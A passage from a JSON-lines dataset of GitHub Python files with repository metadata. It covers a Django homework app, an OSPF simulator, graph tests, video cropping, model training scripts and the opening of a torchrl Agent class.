\"nwp_convlstm_\"+yyyy+\"_\"+str(number_channels)+\".pickle\"\n pickle_out = open(outfile,\"wb\")\n pickle.dump(array_raw, pickle_out)\n pickle_out.close()\n","repo_name":"kieucq/tcg_deep_learning","sub_path":"ConvLSTM/nwp_convlstm_p1.py","file_name":"nwp_convlstm_p1.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31206115934","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom .forms import HomeworkFrom\nfrom django.contrib.auth.models import User\nfrom .models import Homework \n\n# Create your views here.\ndef Homework_list(request):\n homework = Homework.objects.all()\n context = {'homework':homework}\n return render(request, 'HomeworkPublish/list.html',context)\n\ndef Homework_Publish(request,id):\n homework = Homework()\n if request.method == \"POST\":\n Homework_Publish_form = HomeworkFrom(data=request.POST)\n if Homework_Publish_form.is_valid():\n homework.courseNum = id\n homework.Homework_text = request.POST['Homework_text']\n homework.deadline_date = request.POST['deadline_date']\n homework.deadline_time = request.POST['deadline_time']\n homework.save()\n return HttpResponse(\"已发布,请返回刷新页面\")\n else:\n return HttpResponse(\"作业内容有误,请重新填写。\")\n return render(request,'HomeworkPublish/Publish.html',{'hw':homework})\n\ndef Homework_delete(request,id):\n homework = Homework.objects.get(id=id)\n context = {'homework':homework}\n homework.delete()\n return HttpResponse(\"已删除,请返回刷新页面\")","repo_name":"SoftwareGroupTen/demo","sub_path":"HomeworkPublish/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33342699608","text":"import os\nimport setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"geospaas_rest_api\",\n version=os.getenv('GEOSPAAS_REST_API_RELEASE', '0.0.0dev'),\n author=\"Adrien Perrin\",\n author_email=\"adrien.perrin@nersc.no\",\n description=\"REST API for GeoSPaaS\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/nansencenter/django-geo-spaas-rest-api\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: POSIX :: Linux\",\n ],\n python_requires='>=3.7',\n install_requires=[\n 'django_geo_spaas',\n 'django-filter',\n 'djangorestframework',\n 'djangorestframework-filters==1.0.0dev2',\n 'markdown'\n ],\n include_package_data=True,\n)\n","repo_name":"nansencenter/django-geo-spaas-rest-api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"18318008506","text":"from Entity.Router import *\nfrom Entity.Client import *\nfrom Entity.Link import *\nfrom Entity.Packet import *\nimport time\n\n\nclass Network:\n def __init__(self):\n self.routers = []\n self.clients = []\n self.links = []\n self.monitoringIsOn = True\n self.timer = 0\n\n def increaseTimes(self, second):\n for i in range(second):\n self.increaseTime()\n\n def existIdOfRouter(self, id):\n for router in self.routers:\n if router.id == id:\n return True\n return False\n\n def addRouter(self, idOfRouter):\n if self.existIdOfRouter(idOfRouter):\n raise Exception(\"router \" + str(idOfRouter) + \" is exist!\")\n return False\n else:\n self.routers.append(Router(str(idOfRouter), self))\n\n def getRouter(self, id):\n for router in self.routers:\n if router.id == str(id):\n return router\n raise Exception(\"perhaps something is wrong1\")\n return None\n\n def getClient(self, ip):\n for client in self.clients:\n if client.ip == str(ip):\n return client\n return None\n def addLink(self, link):\n if not link in self.links:\n self.links.append(link)\n\n def connectTwoRouter(self, idOfRouter1, idOfRouter2, wieghtOfLink):\n router1 = self.getRouter(idOfRouter1)\n router2 = self.getRouter(idOfRouter2)\n link = Link(idOfRouter1, idOfRouter2, wieghtOfLink, self)\n self.addLink(link)\n router1.connectToOther(link)\n\n def connectClientToRouter(self, ipOfClient, idOfRouter, weigthOfLink):\n client = self.getClient(ipOfClient)\n router = self.getRouter(idOfRouter)\n link = Link(ipOfClient, idOfRouter, weigthOfLink)\n self.addLink(link)\n router.connectToOther(link)\n\n def getLink(self, id1, id2):\n for link in self.links:\n if (link.firstNode == id1 and link.secondNode == id2) or (link.secondNode == id1 and link.firstNode == id2):\n return link\n return None\n\n def breakLink(self, router1, router2):\n link = self.getLink(str(router1), str(router2))\n link.isOk = False\n\n def repairLink(self, router1Id, router2Id):\n link = self.getLink(str(router1Id), str(router2Id))\n router1 = self.getRouter(router1Id)\n link.isOk = True\n router1.repairLink(link)\n\n def ping(self, client1, client2):\n router1 = self.getRouter(client1)\n router1.ping(client2)\n\n def enableMonitoring(self):\n self.monitoringIsOn = True\n\n def disableMonitoring(self):\n self.monitoringIsOn = False\n\n def increaseTime(self):\n self.timer += 1\n for router in self.routers:\n router.increaseTime()\n\n\n\nnetwork = Network()\nnetwork.disableMonitoring()\n\nfile = open(\"test.txt\", 'r')\nnextLing = file.readline()\nwhile nextLing != \"\":\n inp = nextLing.split(\" \")\n for i in range(len(inp)):\n inp[i] = inp[i].strip()\n if inp[0] == \"add\":\n network.addRouter(inp[2])\n elif inp[0] == \"connect\":\n network.connectTwoRouter(inp[1], inp[2], int(inp[3]))\n elif inp[0] == \"sec\":\n network.increaseTimes(int(inp[1]))\n elif inp[0] == \"ping\":\n network.ping(inp[1], inp[2])\n elif inp[0] == \"link\":\n if inp[3] == \"e\":\n network.repairLink(inp[1], inp[2])\n elif inp[3] == \"d\":\n network.breakLink(inp[1], inp[2])\n else:\n raise Exception(\"something wrong2\")\n else:\n raise Exception(\"something wrong3\")\n nextLing = file.readline()","repo_name":"0x16EF/OSPF_simulation","sub_path":"src/Network/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":3619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"35481284451","text":"# coding=utf8\n\n\"\"\"\nThe count-and-say sequence is a sequence of integers in which each term is obtained by reading off the digits of the previous term in order. Its first terms are:\n1. 1\n2. 11\n3. 21\n4. 1211\n5. 111221\n6. 312211\n7. 13112221\n8. 1113213211\n9. 31131211131221\n10. 13211311123112112211\nGiven a positive integer n, output the n-th term of the count-and-say sequence.\nNote: each term of the sequence is represented as a string.\n\"\"\"\n\n# Idea: loop over the previously generated sequence; whenever a digit differs from the last one\n# seen, append [1, num] to the new sequence; when the same digit repeats, increment its count\n\n\nclass Solution(object):\n    def countAndSay(self, n):\n        \"\"\"\n        :type n: int\n        :rtype: str\n        \"\"\"\n        sequence = [1]\n        for _ in range(n-1):\n            next = []\n            for num in sequence:\n                if not next or next[-1] != num:\n                    next += [1, num]\n                else:\n                    next[-2] += 1\n            sequence = next\n\n        return \"\".join(map(str, sequence))\n\n\nn = 10\na = Solution()\nprint(a.countAndSay(n))","repo_name":"PPythonic/LeecodePython","sub_path":"string/countAndsay.py","file_name":"countAndsay.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"43252904271","text":"import pytest\nfrom slink.graphs import Graph, GraphNode\nfrom .conftest import graph_nodes, graph_edges\n\n\ndef test_add_node(graph_nodes):\n graph = Graph()\n node_a, _, _, _, _, _ = graph_nodes\n graph.add_node(node_a.data)\n assert len(graph.nodes) == 1\n assert node_a in graph.nodes\n\n\ndef test_add_edge(graph_nodes):\n graph = Graph()\n node_a, node_b, _, _, _, _ = graph_nodes\n graph.add_node(node_a.data)\n graph.add_node(node_b.data)\n graph.add_edge(node_a, node_b)\n assert node_b in node_a.neighbors\n\n\ndef test_remove_node(graph_edges):\n graph = Graph()\n node_a, node_b, node_c, _, _, _ = graph_edges\n graph.nodes = {node_a, node_b, node_c}\n graph.remove_node(node_b)\n assert len(graph.nodes) == 2\n assert node_b not in graph.nodes\n assert node_b not in node_a.neighbors\n assert node_b not in node_c.neighbors\n\n\ndef test_remove_edge(graph_edges):\n graph = Graph()\n node_a, node_b, node_c, _, _, _ = graph_edges\n graph.nodes = {node_a, node_b, node_c}\n node_a.add_neighbor(node_b)\n node_b.add_neighbor(node_c)\n graph.remove_edge(node_a, node_b)\n assert node_a.neighbors == []\n assert node_b.neighbors == [node_c]\n\n\ndef test_depth_first_search(graph_edges, capsys):\n graph = Graph()\n node_a, _, _, _, _, _ = graph_edges\n graph.nodes = {node_a}\n graph.depth_first_search(node_a)\n captured = capsys.readouterr()\n assert captured.out == \"A\\nB\\nC\\nD\\nE\\nF\\n\"\n\n\ndef test_breadth_first_search(graph_edges, capsys):\n graph = Graph()\n node_a, _, _, _, _, _ = graph_edges\n graph.nodes = {node_a}\n graph.breadth_first_search(node_a)\n captured = capsys.readouterr()\n assert captured.out == \"A\\nB\\nC\\nD\\nE\\nF\\n\"","repo_name":"jgfranco17/slink","sub_path":"tests/test_graphs.py","file_name":"test_graphs.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"39925853152","text":"import cv2\nimport pandas as pd\nimport json\nfrom vidstab import VidStab\nimport os\n\ncount = 0\ntotal = 0\n\ndef processVideo(filename):\n stabilizer = VidStab()\n df_events = pd.DataFrame()\n df_summary = pd.DataFrame()\n fourcc = cv2.VideoWriter_fourcc(*'VP90')\n\n video_in = cv2.VideoCapture(f'./imports/{filename}.mp4')\n width = video_in.get(cv2.CAP_PROP_FRAME_WIDTH)\n height = video_in.get(cv2.CAP_PROP_FRAME_HEIGHT)\n fps = video_in.get(cv2.CAP_PROP_FPS)\n\n frames = video_in.get(cv2.CAP_PROP_FRAME_COUNT)\n fps = int(video_in.get(cv2.CAP_PROP_FPS))\n \n # calculate dusration of the video\n seconds = int(frames / fps)\n print(f'length: {seconds} seconds')\n\n if not os.path.isdir('./exports/' + filename):\n os.mkdir('./exports/' + filename)\n\n # Loads JSON track\n with open(f'./imports/{filename}.json') as f:\n data = json.load(f)['data']['tracks']\n df_events = pd.json_normalize(data, 'events')\n df_events = df_events[df_events['time'] <= seconds]\n\n total = df_events.groupby('uuid').ngroups\n\n def processTrack(df):\n uuid = df.name\n \n if os.path.isdir(f'./exports/{filename}/{uuid}'):\n return\n \n global count\n count = count + 1\n\n print(f'{count} / {total}')\n\n df_frames = df.sort_values(by=['time'])\n\n max_h = max(df_frames.height.max(), 100)\n max_w = max(df_frames.width.max(), 100)\n \n if not os.path.isdir(f'./exports/{filename}/{uuid}'):\n os.mkdir(f'./exports/{filename}/{uuid}')\n \n row = df_frames[df_frames['surprise']==df_frames['surprise'].max()]\n frame = round(row.time.values[0] * fps)\n video_in.set(cv2.CAP_PROP_POS_FRAMES, frame)\n ret, frame = video_in.read()\n x = int(row.x.values[0] - round((max_w - row.width.values[0])/2))\n y = int(row.y.values[0] - round((max_h - row.height.values[0])/2))\n crop = frame[y:y+max_h,x:x+max_w]\n cv2.imwrite(f'./exports/{filename}/{uuid}/thumbnail.png', crop)\n print('Image Generated!')\n\n evt_video_out = cv2.VideoWriter()\n evt_video_out.open(f'./exports/{filename}/{uuid}/source.webm', fourcc, fps, frameSize=(max_w, max_h))\n\n print(f'Creating video for {uuid} length {len(df_frames) / fps} seconds')\n print(max_h)\n print(max_w)\n print(df.name)\n\n for i, row in enumerate(df_frames.iterrows()):\n frame = round(row[1].time*fps)\n video_in.set(cv2.CAP_PROP_POS_FRAMES, frame)\n\n # calculate the adjusted crop size\n ret, frame = video_in.read()\n x = int(row[1].x - round((max_w - row[1].width)/2))\n y = int(row[1].y - round((max_h - row[1].height)/2))\n crop = frame[y:y+max_h,x:x+max_w]\n\n evt_video_out.write(crop)\n\n # try:\n # if len(df) > 30:\n # stabilized_frame = stabilizer.stabilize_frame(input_frame=crop, border_type='black', smoothing_window=30)\n # if stabilized_frame.sum() > 0:\n # evt_video_out.write(stabilized_frame)\n # else:\n # evt_video_out.write(crop)\n # except Exception as e:\n # print('Stablization Failed')\n # break\n \n print('----------------')\n\n evt_video_out.release()\n\n df_events.groupby('uuid').apply(processTrack)\n\nif __name__ == '__main__':\n processVideo('V3136')","repo_name":"Apthox/AqualyticalBackend","sub_path":"videoProcessor.py","file_name":"videoProcessor.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"28005153119","text":"import pdb\n\nimport numpy as np\nimport os\nimport argparse\nfrom tqdm import tqdm\nimport time\nimport torch\nimport torch.utils.data as data\nimport torch.optim as optim\nimport json\nfrom tensorboardX import SummaryWriter\n\nimport mmint_utils as utils\nimport object_keypoints.config as config\nimport object_keypoints.model_utils as model_utils\n\n\ndef train_model(config_file: str, cuda_id: int = 0, no_cuda: bool = False, verbose: bool = False,\n config_args: dict = None):\n # Read config.\n cfg = utils.load_cfg(config_file)\n\n # If any customization is passed via command line - add in here.\n if config_args is not None:\n cfg = utils.combine_cfg(cfg, config_args)\n\n is_cuda = (torch.cuda.is_available() and not no_cuda)\n device = torch.device(\"cuda:%d\" % cuda_id if is_cuda else \"cpu\")\n\n # Shorthands:\n out_dir = cfg['training']['out_dir']\n lr = cfg['training']['learning_rate']\n print_every = cfg['training']['print_every']\n max_epochs = cfg['training']['epochs']\n min_epochs = cfg['training']['min_epochs']\n max_epochs_without_improving = cfg['training']['max_epochs_without_improving']\n vis_dir = os.path.join(out_dir, 'vis')\n\n # Output + vis directory\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n if not os.path.exists(vis_dir):\n os.makedirs(vis_dir)\n logger = SummaryWriter(os.path.join(out_dir, 'logs'))\n\n # Dump config to output directory.\n utils.dump_cfg(os.path.join(out_dir, 'config.yaml'), cfg)\n\n # Create model:\n model = config.get_model(cfg, device=device)\n print(model)\n\n # Setup datasets.\n print('Loading train dataset...')\n train_dataset = config.get_dataset('train', cfg)\n print('Dataset size: %d' % len(train_dataset))\n train_dataloader = data.DataLoader(\n train_dataset,\n batch_size=cfg['training']['batch_size'],\n shuffle=cfg['training']['shuffle'],\n num_workers=16,\n # pin_memory=True\n )\n print('Loading val dataset...')\n validation_dataset = config.get_dataset('val', cfg)\n val_dataloader = data.DataLoader(validation_dataset, batch_size=cfg['training']['val_batch_size'], shuffle=True,\n num_workers=8)\n\n # For vis.\n # vis_dataloader = data.DataLoader(validation_dataset, batch_size=10, shuffle=True)\n # data_vis = next(iter(vis_dataloader))\n\n # Get optimizer (TODO: Parameterize?)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n\n # Get trainer.\n trainer = config.get_trainer(model, optimizer, cfg, logger, vis_dir, device=device)\n\n # Load model + optimizer if exists.\n model_dict = {\n 'model': model,\n 'optimizer': optimizer,\n }\n model_file = os.path.join(out_dir, 'model.pt')\n load_dict = model_utils.load_model(model_dict, model_file)\n epoch_it = load_dict.get('epoch_it', -1)\n it = load_dict.get('it', -1)\n metric_val_best = load_dict.get('val_loss_best', np.inf)\n epoch_without_improving = 0\n\n # Training loop\n start_time = time.time()\n while True:\n epoch_it += 1\n\n if epoch_it > max_epochs or (epoch_without_improving > max_epochs_without_improving and epoch_it > min_epochs):\n print(\"%s Backing up and stopping training.\" % (\n \"Reached max epochs.\" if epoch_it > max_epochs\n else \"Went %d epochs without improving.\" % epoch_without_improving))\n save_dict = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch_it': epoch_it,\n 'it': it,\n 'val_loss_best': metric_val_best\n }\n torch.save(save_dict, os.path.join(out_dir, 'model.pt'))\n break\n\n if epoch_it > 1:\n end_time = time.time()\n per_epoch_avg = (end_time - start_time) / (epoch_it - 
1.0)\n # print(\"Avg per epoch time: \", per_epoch_avg) TODO: Save this information somewhere? Along with total.\n # training time and runs information? Where should this go?\n\n for batch in train_dataloader:\n it += 1\n\n loss = trainer.train_step(batch, it)\n logger.add_scalar('loss', loss, it)\n\n # Print output\n if print_every > 0 and (it % print_every) == 0:\n print('[Epoch %02d] it=%03d, loss=%.4f'\n % (epoch_it, it, loss))\n\n # TODO: Bring back visualization?\n # if visualize_every > 0 and (it % visualize_every) == 0:\n # print('Visualizing.')\n # trainer.visualize(data_vis)\n\n # Validate after each batch.\n print('Validating.')\n val_dict = trainer.validation(val_dataloader, it)\n\n for k, v in val_dict.items():\n if v is not None:\n logger.add_scalar(k, v, epoch_it)\n\n val_loss = val_dict['val_loss']\n if val_loss < metric_val_best:\n epoch_without_improving = 0\n metric_val_best = val_loss\n print('Saving new best model. Loss=%03f' % metric_val_best)\n save_dict = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch_it': epoch_it,\n 'it': it,\n 'val_loss_best': metric_val_best\n }\n torch.save(save_dict, os.path.join(out_dir, 'model_best.pt'))\n else:\n epoch_without_improving += 1\n\n # Backup.\n save_dict = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'epoch_it': epoch_it,\n 'it': it,\n 'val_loss_best': metric_val_best\n }\n torch.save(save_dict, os.path.join(out_dir, 'model.pt'))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Train a model.')\n parser.add_argument('config', type=str, help='Path to config file.')\n parser.add_argument('--cuda_id', type=int, default=0, help=\"Cuda device id to use.\")\n parser.add_argument('--no_cuda', action='store_true', help='Do not use cuda.')\n parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Be verbose.')\n parser.set_defaults(verbose=False)\n parser.add_argument('--config_args', type=json.loads, default=None,\n help='Config elements to overwrite. Use for easy hyperparameter search.')\n args = parser.parse_args()\n\n train_model(args.config, args.cuda_id, args.no_cuda, args.verbose, args.config_args)\n","repo_name":"mvandermerwe/object_keypoints","sub_path":"object_keypoints/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"26895963839","text":"from tropical.pydrone import Pydrone\nfrom jnk3_no_ask1 import model\n\npyd = Pydrone(model, 'simulations_ic_jnk3.h5', 1)\nprint('loaded simulations')\npyd.discretize(cpu_cores=20)\nprint('Discretized trajectories')\npyd.cluster_signatures_spectral(species='__s1_c', nclusters=10, cluster_range=True, cpu_cores=20)\nprint('clustered trajectories')\nac = pyd.analysis_cluster\nps = pyd.plot_signatures\n\nprint('Plotting')\nac.plot_cluster_dynamics([1], fig_name='1', norm=True, norm_value=0.05)\n\n# jnk3 monomer\njnk3 = model.monomers['JNK3']\nmkk4 = model.monomers['MKK4']\npattern = mkk4\n\nac.plot_pattern_rxns_distribution(pattern, type_fig='bar', fig_name='bar_{0}'.format(pattern.name))\nac.plot_pattern_rxns_distribution(pattern, type_fig='entropy', fig_name='ent_{0}'.format(pattern.name))\nac.plot_pattern_sps_distribution(pattern, type_fig='bar', fig_name='bar_{0}'.format(pattern.name))\nac.plot_pattern_sps_distribution(pattern, type_fig='entropy', fig_name='ent_{0}'.format(pattern.name))\n\nps.plot_sequences(type_fig='modal', title='modal')\nps.plot_sequences(type_fig='trajectories', title='trajectories')\n","repo_name":"LoLab-MSM/jarm_analysis","sub_path":"run_tropical.py","file_name":"run_tropical.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"565240471","text":"\"\"\"\nFind Itinerary from a given list of tickets\n\nGiven a list of tickets, find itinerary in order using the given list.\n\nExample:\n\nInput:\n\"Cincinatti\" -> \"Boston\"\n\"Philadelphia\" -> \"NYC\"\n\"Hawai\" -> \"Cincinatti\"\n\"NYC\" -> \"Hawai\"\n\nOutput: \nPhiladelphia->NYC, NYC->Hawai, Hawai->Cincinatti, Cincinatti->Boston\n\n\"\"\"\n\ndef finditinerary(l1):\n s = dict(l1)\n l2 = [(x[1],x[0]) for x in l1]\n d = dict(l2)\n src = [each for each in s if each not in d][0]\n res = []\n while len (res) != len (l1):\n res.append([src, s[src]])\n src = s[src]\n \n print (res)\n \n \n \nl1 = [('Cincinatti', 'Boston'), ('Philadelphia', 'NYC'), ('Hawai', 'Cincinatti'), ('NYC', 'Hawai')]\nfinditinerary(l1)\n","repo_name":"Sathish-sbu/Hashing","sub_path":"find_itinerary.py","file_name":"find_itinerary.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39474788637","text":"import argparse\r\nimport tensorflow as tf\r\nassert tf.__version__.startswith('2')\r\nfrom tflite_model_maker import image_classifier\r\nfrom tflite_model_maker.config import ExportFormat\r\nfrom tflite_model_maker.config import QuantizationConfig\r\nfrom tflite_model_maker.image_classifier import DataLoader\r\nfrom tensorflowjs.converters import convert_tf_saved_model\r\n\r\nif __name__ == \"__main__\":\r\n str2bool = lambda str : False if str.lower() == 'false' else True\r\n parser = argparse.ArgumentParser(description = 'model_maker')\r\n parser.add_argument('--input', type = str, default = \"./\", help = \"input dataset path. default: ./\")\r\n parser.add_argument('--output', type = str, default = './', help = 'output model path. default: ./')\r\n parser.add_argument('--epochs', type = int, default = 30, help = 'More epochs could achieve better accuracy until it converges but training for too many epochs may lead to overfitting. 30 by default')\r\n parser.add_argument('--batch_size', type = int, default = 32, help = 'Number of samples to use in one training step. 32 by default')\r\n parser.add_argument('--lr', type = float, default = 0.0005, help = 'Base learning rate. 0.0005 by default')\r\n parser.add_argument('--dropout', type = float, default = 0.3, help = 'The rate for dropout, avoid overfitting. 0.3 by default')\r\n parser.add_argument('--train_whole', type = str2bool, default = 'True', help = 'Boolean, if true, the Hub module is trained together with the classification layer on top. Otherwise, only train the top classification layer. True by default')\r\n parser.add_argument('--use_augmentation', type = str2bool, default = 'True', help = 'Boolean, use data augmentation for preprocessing. True by default.')\r\n parser.add_argument('--split_train', type = int, default = 0.8, help = 'Split train dataset ratio. 0.8 by default')\r\n parser.add_argument('--split_valid', type = int, default = 0.5, help = 'Split valid dataset ratio. 0.5 by default')\r\n parser.add_argument('--shuffle', type = str2bool, default = 'True', help = 'Boolean, whether the data should be shuffled. 
True by default.')\r\n # 导入数据集\r\n data = DataLoader.from_folder(parser.parse_args().input)\r\n # 数据集划分 训练集80% 测试集10% 验证集10%\r\n train_data, rest_data = data.split(parser.parse_args().split_train)\r\n validation_data, test_data = rest_data.split(parser.parse_args().split_valid)\r\n # 创建模型\r\n model = image_classifier.create(\r\n train_data, \r\n model_spec = image_classifier.ModelSpec(\r\n uri = \"https://hub.tensorflow.google.cn/google/imagenet/mobilenet_v2_050_224/feature_vector/5\",\r\n input_image_shape = [224, 224]\r\n ), \r\n validation_data = validation_data,\r\n epochs = parser.parse_args().epochs,\r\n batch_size = parser.parse_args().batch_size,\r\n learning_rate = parser.parse_args().lr,\r\n dropout_rate = parser.parse_args().dropout,\r\n train_whole_model = parser.parse_args().train_whole,\r\n use_augmentation = parser.parse_args().use_augmentation,\r\n shuffle = parser.parse_args().shuffle,\r\n )\r\n # 模型评估\r\n _, accuracy = model.evaluate(test_data)\r\n print(\"测试集精度: {}\".format(accuracy))\r\n # 模型量化导出\r\n model.export(\r\n with_metadata = False,\r\n export_dir = parser.parse_args().output, \r\n export_format = [ExportFormat.LABEL, ExportFormat.SAVED_MODEL, ExportFormat.TFLITE],\r\n quantization_config = QuantizationConfig(\r\n optimizations = tf.lite.Optimize.DEFAULT,\r\n representative_data = validation_data,\r\n supported_ops = tf.lite.OpsSet.TFLITE_BUILTINS_INT8,\r\n inference_input_type = tf.int8, \r\n inference_output_type = tf.int8)\r\n )\r\n # 模型量化精度\r\n print(\"测试集量化精度: {}\".format(model.evaluate_tflite('model.tflite', data = test_data)['accuracy']))\r\n # 模型转换tfjs格式\r\n convert_tf_saved_model(\"saved_model\", \"tfjs_model\")","repo_name":"FunCodersTeam/ModelMaker","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7530562505","text":"import pandas as pd\nimport webbrowser\nimport os\n\n\nif __name__ == \"__main__\":\n input_file_path = 'munich_doener_df.json'\n doener_df = pd.read_json(input_file_path, lines=True)\n\n \n df_price_file_path = 'munich_doener_df_with_price.json'\n if not os.path.exists(df_price_file_path):\n doener_df.to_json(df_price_file_path, orient='records', lines=True)\n\n num_doeners = len(doener_df)\n\n for idx, place in doener_df.iterrows():\n\n doener_df = pd.read_json(df_price_file_path, lines=True)\n\n place_id = place['place_id']\n maps_url = f\"https://www.google.com/maps/place/?q=place_id:{place_id}\"\n # Open the URL in the default web browser\n webbrowser.open(maps_url)\n print(f\"Döner {idx} out of {num_doeners}: {place['name']}, {place['address']}\")\n price = input(\"Dönerpreis / €:\")\n year = input(\"Jahr:\")\n\n doener_df.at[idx, 'year'] = year\n doener_df.at[idx, 'price'] = price\n\n doener_df.to_json(df_price_file_path, orient='records', lines=True)\n ","repo_name":"Bobo1239/doenerkarte","sub_path":"google_maps_data/doener_entry.py","file_name":"doener_entry.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1740020019","text":"from __future__ import annotations\n\nimport pathlib\nimport warnings\nfrom collections import OrderedDict\nfrom textwrap import indent\nfrom typing import Callable, Dict, Optional, Union, Sequence\n\nimport numpy as np\nimport torch.nn\nfrom torch import nn, optim\n\ntry:\n from tqdm import tqdm\n\n _has_tqdm = True\nexcept ImportError:\n _has_tqdm = False\n\nfrom torchrl.collectors.collectors import _DataCollector\nfrom torchrl.data import (\n ReplayBuffer,\n TensorDictPrioritizedReplayBuffer,\n TensorDictReplayBuffer,\n)\nfrom torchrl.data.tensordict.tensordict import _TensorDict\nfrom torchrl.data.utils import expand_right\nfrom torchrl.envs.common import _EnvClass\nfrom torchrl.envs.transforms import TransformedEnv\nfrom torchrl.envs.utils import set_exploration_mode\nfrom torchrl.modules import reset_noise, TDModuleWrapper\nfrom torchrl.objectives.costs.common import _LossModule\nfrom torchrl.objectives.costs.utils import _TargetNetUpdate\n\nREPLAY_BUFFER_CLASS = {\n \"prioritized\": TensorDictPrioritizedReplayBuffer,\n \"circular\": TensorDictReplayBuffer,\n}\n\nWRITER_METHODS = {\n \"grad_norm\": \"add_scalar\",\n \"loss\": \"add_scalar\",\n}\n\n__all__ = [\"Agent\"]\n\n\nclass Agent:\n \"\"\"A generic Agent class.\n\n An agent is responsible of collecting data and training the model.\n To keep the class as versatile as possible, Agent does not construct any\n of its components: they all must be provided as argument when\n initializing the object.\n To build an Agent, one needs a iterable data source (a `collector`), a\n loss module, an optimizer. Optionally, a recorder (i.e. an environment\n instance used for testing purposes) and a policy can be provided for\n evaluating the training progress.\n\n Args:\n collector (Sequence[_TensorDict]): An iterable returning batches of\n data in a TensorDict form of shape [batch x time steps].\n total_frames (int): Total number of frames to be collected during\n training.\n loss_module (_LossModule): A module that reads TensorDict batches\n (possibly sampled from a replay buffer) and return a loss\n TensorDict where every key points to a different loss component.\n optimizer (optim.Optimizer): An optimizer that trains the parameters\n of the model.\n recorder (_EnvClass, optional): An environment instance to be used\n for testing.\n optim_scheduler (optim.lr_scheduler._LRScheduler, optional):\n learning rate scheduler.\n target_net_updater (_TargetNetUpdate, optional):\n a target network updater.\n policy_exploration (ProbabilisticTDModule, optional): a policy\n instance used for\n\n (1) updating the exploration noise schedule;\n\n (2) testing the policy on the recorder.\n\n Given that this instance is supposed to both explore and render\n the performance of the policy, it should be possible to turn off\n the explorative behaviour by calling the\n `set_exploration_mode('mode')` context manager.\n replay_buffer (ReplayBuffer, optional): a replay buffer for offline\n learning.\n writer (SummaryWriter, optional): a Tensorboard summary writer for\n logging purposes.\n update_weights_interval (int, optional): interval between two updates\n of the weights of a model living on another device. By default,\n the weights will be updated after every collection of data.\n record_interval (int, optional): total number of optimisation steps\n between two calls to the recorder for testing. Default is 10000.\n record_frames (int, optional): number of frames to be recorded during\n testing. 
Default is 1000.\n frame_skip (int, optional): frame_skip used in the environment. It is\n important to let the agent know the number of frames skipped at\n each iteration, otherwise the frame count can be underestimated.\n For logging, this parameter is important to normalize the reward.\n Finally, to compare different runs with different frame_skip,\n one must normalize the frame count and rewards. Default is 1.\n optim_steps_per_batch (int, optional): number of optimization steps\n per collection of data. An agent works as follows: a main loop\n collects batches of data (epoch loop), and a sub-loop (training\n loop) performs model updates in between two collections of data.\n Default is 500\n batch_size (int, optional): batch size when sampling data from the\n latest collection or from the replay buffer, if it is present.\n If no replay buffer is present, the sub-sampling will be\n achieved over the latest collection with a resulting batch of\n size (batch_size x sub_traj_len).\n Default is 256\n clip_grad_norm (bool, optional): If True, the gradients will be clipped\n based on the total norm of the model parameters. If False,\n all the partial derivatives will be clamped to\n (-clip_norm, clip_norm). Default is `True`.\n clip_norm (Number, optional): value to be used for clipping gradients.\n Default is 100.0.\n progress_bar (bool, optional): If True, a progress bar will be\n displayed using tqdm. If tqdm is not installed, this option\n won't have any effect. Default is `True`\n seed (int, optional): Seed to be used for the collector, pytorch and\n numpy. Default is 42.\n save_agent_interval (int, optional): How often the agent should be\n saved to disk. Default is 10000.\n save_agent_file (path, optional): path where to save the agent.\n Default is None (no saving)\n normalize_rewards_online (bool, optional): if True, the running\n statistics of the rewards are computed and the rewards used for\n training will be normalized based on these.\n Default is `False`\n sub_traj_len (int, optional): length of the trajectories that\n sub-samples must have in online settings. Default is -1 (i.e.\n takes the full length of the trajectory)\n min_sub_traj_len (int, optional): minimum value of `sub_traj_len`, in\n case some elements of the batch contain few steps.\n Default is -1 (i.e. no minimum 